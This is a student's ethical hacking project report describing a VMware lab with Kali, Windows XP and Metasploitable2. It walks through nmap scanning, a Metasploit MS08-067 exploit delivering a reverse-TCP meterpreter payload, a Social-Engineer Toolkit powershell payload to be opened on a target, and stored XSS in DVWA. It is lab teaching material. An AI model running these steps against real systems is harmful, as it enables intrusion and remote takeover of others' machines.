Ethical Hacking Project Work

K Bhanu Prasad
Contents :-
1. Lab setup
2. Scanning of ports and Vulnerability Scanning
3. System Hacking
4. Cross Site Scripting
 1. Lab Setup

Step 1-> download and install vmware in your PC

https://www.vmware.com/products/workstation-player/workstation-playerevaluation.html

Step 2-> now download Kali linux file and open the .vmx file in the
Vmware in the PC. I got the file from the below link
https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

Default username:- kali

Default Password:- kali
Step 3 -> now download Windows xp or 7 etc ISO file and install it in
as a new Vmware device in the PC. The file from the below link
https://mega.nz/file/vEVimKwJ#qaqBh8vhZ-C7d75qrbQSim8mUxfbd9QWntfDRu8ZSKc

Reference Youtube link:- https://youtu.be/K1rw6iApeBE

Step 4 -> now download Metasploitable2-Linux and open the .vmx file
Vmware in the PC. The file from the below link.
sourceforge.net/projects/metasploitable/files/Metasploitable2
This tools is used as universal hacking tool and cross site scripting.
Default Username = msfadmin
Default Password = msfadmin
 2. Scanning of ports and Vulnerability Scanning
Scanning is the process of identifying live systems, services and open
ports that exist on those systems. Steps involved are,
1. Configuring ip
2. Finding the targets
3. Scanning the ports
4. Vulnerability scanning

Step 1:- first check your system Ip by using command “ifconfig”. Mine
is 192.168.64.131.

Step2 :- find the targets on the network by using the command

netdiscover –r target ip . After executing the command it shows a
Step 3:- my target machine is with ip 192.168.64.132 , now scanning
the ports by using the command nmap –O target ip.
Step 4:- now for scanning the vulnerabilities use the command
nmap --script vuln target ip
 3.System Hacking
The process of gaining access to an operating system is known as
system hacking. There are two models for exploiting the vulnerability
of an operating system. They are
1. Passive method
2. Active method
Passive method:-
In this method I am gaining the access of Windows xp machine;
Steps involved are:-
1. In linux type “msfconsole” then msf > will appear

2. Type “search08-067” (note: this is a vulnerability that is present in

the xp system)
3. copy the name (path ) and type (paste the path)
use exploit/windows/smb/ms08_067_netap
4.a payload have to be injected , hence type show payloads… a
List of payloads will be appeared, select and copy
windows/meterpreter/reverse_tc
5. type “set payload windows/meterpreter/reverse_tcp” ,then
type “show options”
 6.RHOST and LHOST is blank. So I need to assign RHOST (IP address of
target) and LHOST (IP address of attacker machine). Use set command.

7. Type “exploit”, payload gets started injected into the target and a
meterpreter>is displayed stating that payload injection is successful.

8. type “systeminfo” to get the target information.

Active method:-
In passive system hacking, we exploited the operating system without even
touching the system. However, in active system hacking, we need physical
access for a certain amount of time to the operating system or we will have to
use social engineering to make the payload execute at target operating system.

Steps included are:-

1.Type “setoolkit”

2. type 1 for social Engineering attacks

3) Type 9 for powershell attack vector then 1 for powershell alphanumeric
code injector and select ‘yes’

4) enter your ip address and the port 443 then metasploit automatically starts,
and a file will be created in /root/.set/reports/powershell directory. Share and
open that file anyhow by using any method into the target system( my case its
windows xp)
5) After the above step we can get the access of the target, and by using
sessions we can track the actions of the target.
 4) Cross Site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically
found in Web applications. XSS enables attackers to inject client-side script into
Web pages viewed by other users. A cross-site scripting vulnerability may be
used by attackers to bypass access controls such as the same origin policy.
For this we are using Damn Vulnerable Web App (DVWA), which is php/mysql web application
which aims to be an aid for security professionals to test their skills and tools in a legal environment,
help web developers better understand the processes of securing web applications and to aid both
students & teachers to learn about web application security in a controlled class room environment.

Steps involved are:-

1. Start the Metasploitable 2 in your vmware.
2. Find out the ip using ifconfig.
3. Now open DVWA in your web browser by typing the IP address of
Metasploitable 2 machine.
 4. now go to setup and set security to low.

5. select Xss stored and type as follows as in image , and the

result will be displayed as an alert.
6. Similary for more test cases we can perform with different scripts as
Now the result alert is the cookie that is generated while executing the
above script.